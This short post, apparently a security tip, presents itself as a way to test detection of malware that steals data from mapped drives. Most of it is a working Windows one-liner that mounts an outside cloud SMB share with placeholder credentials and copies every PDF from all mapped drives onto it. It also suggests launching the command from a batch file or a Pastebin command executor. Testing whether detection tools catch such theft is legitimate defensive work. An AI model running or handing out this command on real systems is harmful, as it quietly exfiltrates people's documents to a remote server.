The below is a way to test whether detection mechanisms can detect malware or ransomware that exfiltrates data on mapped drives. You could put the below in a .bat file (be sure to add another % for each variable) or you could execute it in another way such as Pastebin command executor .
To use the below you setup a SMB server on a server in cloud and simply run the oneliner below to find all PDF documents on all your mapped drives and upload them to your cloud server. Xcopy is installed by default in Windows 10.
net use r: \yourcloudserver\smb /user:kali\smbuser smbpassword & net use | findstr : | for /f "tokens=1 delims= " %a in ('findstr \') do xcopy %a*.pdf r:\ /e /s